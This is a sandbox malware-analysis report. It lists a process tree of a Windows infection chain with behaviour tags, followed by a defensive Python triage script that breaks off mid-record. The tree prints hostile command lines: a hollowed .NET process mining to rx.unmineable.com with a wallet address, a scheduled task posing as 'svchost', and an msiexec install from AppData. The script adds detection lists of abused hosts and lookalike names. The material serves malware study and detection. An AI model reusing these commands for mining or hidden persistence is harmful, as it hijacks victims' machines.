[1] C:\Users\Admin\AppData\Local\Temp\0d558642cb8576c04cad2835209a1ee8ffd40061f985a8ba8ab4d4f45ada5ad4.exe
    Command line: "C:\Users\Admin\AppData\Local\Temp\0d558642cb8576c04cad2835209a1ee8ffd40061f985a8ba8ab4d4f45ada5ad4.exe"
    - Identifies VirtualBox via ACPI registry values (likely anti-VM)
    - Checks BIOS information in registry
    - Checks computer location settings
    - Identifies Wine through registry keys
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - Drops file in Windows directory
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of FindShellTrayWindow
    - Suspicious use of WriteProcessMemory
    PID: 4788
  [2] C:\Users\Admin\AppData\Local\Temp\0d8f5eb8a7\explorti.exe
      Command line: "C:\Users\Admin\AppData\Local\Temp\0d8f5eb8a7\explorti.exe"
      - Identifies VirtualBox via ACPI registry values (likely anti-VM)
      - Checks BIOS information in registry
      - Checks computer location settings
      - Executes dropped EXE
      - Identifies Wine through registry keys
      - Adds Run key to start application
      - Suspicious use of NtSetInformationThreadHideFromDebugger
      - System Location Discovery: System Language Discovery
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of WriteProcessMemory
      PID: 3116
    [3] C:\Users\Admin\AppData\Local\Temp\1000020001\471a98aee8.exe
        Command line: "C:\Users\Admin\AppData\Local\Temp\1000020001\471a98aee8.exe"
        - Checks computer location settings
        - Executes dropped EXE
        - System Location Discovery: System Language Discovery
        - Suspicious use of WriteProcessMemory
        PID: 1492
      [4] C:\Windows\system32\cmd.exe
          Command line: "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\C37F.tmp\C380.tmp\C381.bat C:\Users\Admin\AppData\Local\Temp\1000020001\471a98aee8.exe"
          - Suspicious use of WriteProcessMemory
          PID: 4860
        [5] C:\Program Files\Google\Chrome\Application\chrome.exe
            Command line: "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://www.youtube.com/account"
            - Enumerates system info in registry
            - Suspicious behavior: EnumeratesProcesses
            - Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
            - Suspicious use of AdjustPrivilegeToken
            - Suspicious use of FindShellTrayWindow
            - Suspicious use of SendNotifyMessage
            - Suspicious use of WriteProcessMemory
            PID: 2348
          [6] C:\Program Files\Google\Chrome\Application\chrome.exe
              Command line: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.106 --initial-client-data=0x104,0x108,0x10c,0xe0,0x110,0x7ffebe23cc40,0x7ffebe23cc4c,0x7ffebe23cc58
              PID: 752
          [6] C:\Program Files\Google\Chrome\Application\chrome.exe
              Command line: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1944,i,8199306318284248444,9025721501852979593,262144 --variations-seed-version=20240730-050116.493000 --mojo-platform-channel-handle=1940 /prefetch:2
              PID: 764
          [6] C:\Program Files\Google\Chrome\Application\chrome.exe
              Command line: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=2168,i,8199306318284248444,9025721501852979593,262144 --variations-seed-version=20240730-050116.493000 --mojo-platform-channel-handle=2192 /prefetch:3
              PID: 2636
          [6] C:\Program Files\Google\Chrome\Application\chrome.exe
              Command line: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2252,i,8199306318284248444,9025721501852979593,262144 --variations-seed-version=20240730-050116.493000 --mojo-platform-channel-handle=2600 /prefetch:8
              PID: 4308
          [6] C:\Program Files\Google\Chrome\Application\chrome.exe
              Command line: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3112,i,8199306318284248444,9025721501852979593,262144 --variations-seed-version=20240730-050116.493000 --mojo-platform-channel-handle=3172 /prefetch:1
              PID: 5560
          [6] C:\Program Files\Google\Chrome\Application\chrome.exe
              Command line: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3116,i,8199306318284248444,9025721501852979593,262144 --variations-seed-version=20240730-050116.493000 --mojo-platform-channel-handle=3196 /prefetch:1
              PID: 5568
          [6] C:\Program Files\Google\Chrome\Application\chrome.exe
              Command line: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --no-appcompat-clear --gpu-preferences=WAAAAAAAAADoAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAACEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=844,i,8199306318284248444,9025721501852979593,262144 --variations-seed-version=20240730-050116.493000 --mojo-platform-channel-handle=4348 /prefetch:8
              - Drops file in System32 directory
              PID: 7540
        [5] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
            Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" "https://www.youtube.com/account"
            - Enumerates system info in registry
            - Suspicious behavior: EnumeratesProcesses
            - Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
            - Suspicious use of FindShellTrayWindow
            - Suspicious use of SendNotifyMessage
            - Suspicious use of WriteProcessMemory
PID:848 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x108,0x10c,0x110,0xe4,0x114,0x7ffebe0f46f8,0x7ffebe0f4708,0x7ffebe0f47186⤵PID:4648
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2136,9315870064783897743,3894212314872755150,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2152 /prefetch:26⤵PID:1064
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2136,9315870064783897743,3894212314872755150,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2228 /prefetch:36⤵
- Suspicious behavior: EnumeratesProcesses
PID:888 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2136,9315870064783897743,3894212314872755150,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2696 /prefetch:86⤵PID:1584
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2136,9315870064783897743,3894212314872755150,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3540 /prefetch:16⤵PID:2328
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2136,9315870064783897743,3894212314872755150,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3560 /prefetch:16⤵PID:408
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2136,9315870064783897743,3894212314872755150,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4812 /prefetch:16⤵PID:2648
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2136,9315870064783897743,3894212314872755150,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1816 /prefetch:26⤵PID:7476
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" "https://www.youtube.com/account"5⤵
- Suspicious use of WriteProcessMemory
PID:5064 -
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" https://www.youtube.com/account6⤵
- Checks processor information in registry
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1056 -
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=1980 -parentBuildID 20240401114208 -prefsHandle 1888 -prefMapHandle 1880 -prefsLen 23680 -prefMapSize 244658 -appDir "C:\Program Files\Mozilla Firefox\browser" - {53e5f022-890f-4641-bc25-6435b881c0a7} 1056 "\\.\pipe\gecko-crash-server-pipe.1056" gpu7⤵PID:876
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2392 -parentBuildID 20240401114208 -prefsHandle 2448 -prefMapHandle 2444 -prefsLen 24600 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {4bbd761e-7204-4378-bc7c-64570d4434fc} 1056 "\\.\pipe\gecko-crash-server-pipe.1056" socket7⤵PID:4992
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3276 -childID 1 -isForBrowser -prefsHandle 3292 -prefMapHandle 3188 -prefsLen 22652 -prefMapSize 244658 -jsInitHandle 1140 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {0fc26526-eabd-4dc7-9f61-97d1368d5d9a} 1056 "\\.\pipe\gecko-crash-server-pipe.1056" tab7⤵PID:3584
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3756 -childID 2 -isForBrowser -prefsHandle 2880 -prefMapHandle 3200 -prefsLen 29090 -prefMapSize 244658 -jsInitHandle 1140 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {328eb413-cf5c-4040-baf6-6352daf96de4} 1056 "\\.\pipe\gecko-crash-server-pipe.1056" tab7⤵PID:1224
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4620 -parentBuildID 20240401114208 -sandboxingKind 0 -prefsHandle 4612 -prefMapHandle 4608 -prefsLen 29090 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {367c94ec-d0da-40e9-881f-6a57780e030e} 1056 "\\.\pipe\gecko-crash-server-pipe.1056" utility7⤵
- Checks processor information in registry
PID:5760 -
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5492 -childID 3 -isForBrowser -prefsHandle 5484 -prefMapHandle 5480 -prefsLen 27132 -prefMapSize 244658 -jsInitHandle 1140 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {56b2e0f3-cc98-4896-8892-5958027b8893} 1056 "\\.\pipe\gecko-crash-server-pipe.1056" tab7⤵PID:5180
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5612 -childID 4 -isForBrowser -prefsHandle 5372 -prefMapHandle 5620 -prefsLen 27132 -prefMapSize 244658 -jsInitHandle 1140 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {ddc51cbc-d576-46b5-9838-d03e866fba5b} 1056 "\\.\pipe\gecko-crash-server-pipe.1056" tab7⤵PID:5468
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5880 -childID 5 -isForBrowser -prefsHandle 5800 -prefMapHandle 5804 -prefsLen 27132 -prefMapSize 244658 -jsInitHandle 1140 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {aa4773f0-857f-4bd6-84d5-12fdc287b3fc} 1056 "\\.\pipe\gecko-crash-server-pipe.1056" tab7⤵PID:5664
-
C:\Users\Admin\AppData\Local\Temp\0d8f5eb8a7\explorti.exe"C:\Users\Admin\AppData\Local\Temp\0d8f5eb8a7\explorti.exe"3⤵PID:5984
-
C:\Users\Admin\1000029002\a2f7c1badc.exe"C:\Users\Admin\1000029002\a2f7c1badc.exe"3⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
PID:5692 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5692 -s 10964⤵
- Program crash
PID:6216 -
C:\Users\Admin\AppData\Local\Temp\1000030001\879432f808.exe"C:\Users\Admin\AppData\Local\Temp\1000030001\879432f808.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:5224 -
C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe"C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe"4⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:5064 -
C:\Users\Admin\AppData\Local\Temp\1000056001\deepweb.exe"C:\Users\Admin\AppData\Local\Temp\1000056001\deepweb.exe"5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
PID:1492 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"6⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5748 -
C:\Users\Admin\AppData\Local\Temp\pureee.exe"C:\Users\Admin\AppData\Local\Temp\pureee.exe"7⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
PID:6300 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe -o rx.unmineable.com:3333 -a rx -k -u ETC:0x612e5dBaff1fa2Be8D30e5684630c26db5c5196B.RIG_CPU -p x --cpu-max-threads-hint=508⤵PID:8348
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe -o rx.unmineable.com:3333 -a rx -k -u ETC:0x612e5dBaff1fa2Be8D30e5684630c26db5c5196B.RIG_CPU -p x --cpu-max-threads-hint=508⤵PID:8164
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe -o rx.unmineable.com:3333 -a rx -k -u ETC:0x612e5dBaff1fa2Be8D30e5684630c26db5c5196B.RIG_CPU -p x --cpu-max-threads-hint=508⤵PID:8900
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe -o rx.unmineable.com:3333 -a rx -k -u ETC:0x612e5dBaff1fa2Be8D30e5684630c26db5c5196B.RIG_CPU -p x --cpu-max-threads-hint=508⤵PID:7992
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe -o rx.unmineable.com:3333 -a rx -k -u ETC:0x612e5dBaff1fa2Be8D30e5684630c26db5c5196B.RIG_CPU -p x --cpu-max-threads-hint=508⤵PID:9188
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe -o rx.unmineable.com:3333 -a rx -k -u ETC:0x612e5dBaff1fa2Be8D30e5684630c26db5c5196B.RIG_CPU -p x --cpu-max-threads-hint=508⤵PID:4228
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe -o rx.unmineable.com:3333 -a rx -k -u ETC:0x612e5dBaff1fa2Be8D30e5684630c26db5c5196B.RIG_CPU -p x --cpu-max-threads-hint=508⤵PID:8136
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe -o rx.unmineable.com:3333 -a rx -k -u ETC:0x612e5dBaff1fa2Be8D30e5684630c26db5c5196B.RIG_CPU -p x --cpu-max-threads-hint=508⤵PID:6276
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe -o rx.unmineable.com:3333 -a rx -k -u ETC:0x612e5dBaff1fa2Be8D30e5684630c26db5c5196B.RIG_CPU -p x --cpu-max-threads-hint=508⤵PID:6728
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe -o rx.unmineable.com:3333 -a rx -k -u ETC:0x612e5dBaff1fa2Be8D30e5684630c26db5c5196B.RIG_CPU -p x --cpu-max-threads-hint=508⤵PID:6620
-
C:\Users\Admin\AppData\Local\Temp\adada.exe"C:\Users\Admin\AppData\Local\Temp\adada.exe"7⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:7868 -
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "svchost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\svchost.exe" /rl HIGHEST /f8⤵
- Scheduled Task/Job: Scheduled Task
PID:7092 -
C:\Users\Admin\AppData\Local\Temp\dropperrr.exe"C:\Users\Admin\AppData\Local\Temp\dropperrr.exe"7⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Modifies registry class
PID:8000 -
C:\Windows\System32\msiexec.exe"C:\Windows\System32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\DirectX11\em_TaWHWZA1_installer_Win7-Win11_x86_x64.msi.msi"8⤵
- Blocklisted process makes network request
- Enumerates connected drives
PID:7412
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:1492
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:5776
-
C:\Program Files\Google\Chrome\Application\123.0.6312.106\elevation_service.exe"C:\Program Files\Google\Chrome\Application\123.0.6312.106\elevation_service.exe"1⤵PID:5780
-
C:\Users\Admin\AppData\Local\Temp\0d8f5eb8a7\explorti.exeC:\Users\Admin\AppData\Local\Temp\0d8f5eb8a7\explorti.exe1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:5700
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 452 -p 5692 -ip 56921⤵PID:6188
-
C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exeC:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:8964
-
C:\Users\Admin\AppData\Local\Temp\0d8f5eb8a7\explorti.exeC:\Users\Admin\AppData\Local\Temp\0d8f5eb8a7\explorti.exe1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:8956
-
C:\Windows\system32\msiexec.exeC:\Windows\system32\msiexec.exe /V1⤵PID:7224
-
C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exeC:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:8564
-
C:\Users\Admin\AppData\Local\Temp\0d8f5eb8a7\explorti.exeC:\Users\Admin\AppData\Local\Temp\0d8f5eb8a7\explorti.exe1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:8548
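Four behaviours in the tree above are worth turning into detection logic rather than reading off by hand: a loader living in the user's Temp directory starting a .NET framework helper (RegAsm.exe under deepweb.exe, AddInProcess.exe under pureee.exe, both flagged with "Suspicious use of SetThreadContext"); AddInProcess.exe carrying an XMRig-compatible pool/wallet command line; schtasks registering an ONLOGON task named "svchost" that runs from AppData\Roaming at the highest run level; and msiexec installing a package from AppData\Roaming. The Python below is an added example, not part of the report or of any tool it names. The .NET host list beyond the two binaries seen here, the miner flag set and the system-name lookalike list are analyst assumptions, and the sample records are constructed from the command lines shown in the tree.

```python
"""
Heuristic triage of sandbox process-tree records: each rule encodes one
behaviour visible in the tree (user-path loader hollowing a .NET helper,
miner command line, ONLOGON task from the user profile, msiexec package
from AppData).  SAMPLE is constructed from the report's own lines.
"""
from __future__ import annotations
import re
from dataclasses import dataclass

# Analyst-chosen list of .NET framework utilities commonly abused as
# hollowing targets; RegAsm.exe and AddInProcess.exe are the two seen here.
DOTNET_HOSTS = {
    "regasm.exe", "regsvcs.exe", "addinprocess.exe", "addinprocess32.exe",
    "installutil.exe", "msbuild.exe", "applaunch.exe", "aspnet_compiler.exe",
}
# Names a persistence task likes to borrow (assumption, not from the report).
SYSTEM_LOOKALIKES = {"svchost", "csrss", "lsass", "winlogon", "services",
                     "explorer", "dllhost", "conhost", "runtimebroker"}
# Flags used by xmrig-compatible miners; three or more together is a hit.
MINER_FLAGS = {"-o", "-a", "-u", "-p", "-k", "--cpu-max-threads-hint",
               "--donate-level", "--coin", "--algo", "--url", "--user"}
USER_WRITABLE = re.compile(r"(?i)^[a-z]:\\(users|programdata)\\")
TOKEN = re.compile(r'"([^"]*)"|(\S+)')


@dataclass
class Proc:
    pid: int
    image: str
    cmdline: str
    parent_image: str = ""


def tokens(cmdline: str) -> list[str]:
    """Split a Windows command line, keeping quoted paths as one token."""
    return [q or bare for q, bare in TOKEN.findall(cmdline)]


def basename(path: str) -> str:
    return path.strip('"').rsplit("\\", 1)[-1].lower()


def value_after(toks: list[str], flag: str) -> str | None:
    """Token following a flag, matched case-insensitively (e.g. '/tr')."""
    low = [t.lower() for t in toks]
    if flag.lower() in low:
        i = low.index(flag.lower())
        if i + 1 < len(toks):
            return toks[i + 1]
    return None


def rule_dotnet_host_from_user_path(p: Proc) -> str | None:
    """A .NET helper whose parent lives in a user-writable directory."""
    if basename(p.image) in DOTNET_HOSTS and USER_WRITABLE.search(p.parent_image):
        return f"{basename(p.image)} spawned by {p.parent_image}"
    return None


def rule_miner_cli(p: Proc) -> str | None:
    toks = tokens(p.cmdline)
    names = {t.split("=", 1)[0].lower() for t in toks if t.startswith("-")}
    if len(names & MINER_FLAGS) < 3:
        return None
    return (f"miner-style arguments: pool={value_after(toks, '-o')} "
            f"wallet={value_after(toks, '-u')}")


def rule_schtasks_logon(p: Proc) -> str | None:
    if basename(p.image) != "schtasks.exe":
        return None
    toks = tokens(p.cmdline)
    if "/create" not in (t.lower() for t in toks):
        return None
    reasons = []
    sched = (value_after(toks, "/sc") or "").lower()
    run = value_after(toks, "/tr") or ""
    if sched in {"onlogon", "onstart"} and USER_WRITABLE.search(run):
        reasons.append(f"{sched} task executes {run}")
    if (value_after(toks, "/rl") or "").lower() == "highest":
        reasons.append("requests highest run level")
    name = (value_after(toks, "/tn") or "").rsplit("\\", 1)[-1].lower()
    if name in SYSTEM_LOOKALIKES:
        reasons.append(f"task name '{name}' mimics a system process")
    return "; ".join(reasons) or None


def rule_msiexec_user_package(p: Proc) -> str | None:
    if basename(p.image) != "msiexec.exe":
        return None
    pkg = value_after(tokens(p.cmdline), "/i")
    if pkg and USER_WRITABLE.search(pkg):
        return f"installs package from user profile: {pkg}"
    return None


RULES = (rule_dotnet_host_from_user_path, rule_miner_cli,
         rule_schtasks_logon, rule_msiexec_user_package)


def triage(procs: list[Proc]) -> list[tuple[int, str, str]]:
    """(pid, rule name, detail) for every rule that fires on every record."""
    hits = []
    for p in procs:
        for rule in RULES:
            detail = rule(p)
            if detail:
                hits.append((p.pid, rule.__name__, detail))
    return hits


# Records constructed from the process tree above (paths and PIDs as shown).
NET = r"C:\Windows\Microsoft.NET\Framework"
TMP = r"C:\Users\Admin\AppData\Local\Temp"
SAMPLE = [
    Proc(5748, NET + r"\v4.0.30319\RegAsm.exe",
         '"' + NET + r'\v4.0.30319\RegAsm.exe"', TMP + r"\1000056001\deepweb.exe"),
    Proc(8348, NET + r"64\v4.0.30319\AddInProcess.exe",
         NET + r"64\v4.0.30319\AddInProcess.exe -o rx.unmineable.com:3333 -a rx -k "
         r"-u ETC:0x612e5dBaff1fa2Be8D30e5684630c26db5c5196B.RIG_CPU -p x "
         r"--cpu-max-threads-hint=50", TMP + r"\pureee.exe"),
    Proc(7092, r"C:\Windows\SYSTEM32\schtasks.exe",
         r'"schtasks" /create /tn "svchost" /sc ONLOGON '
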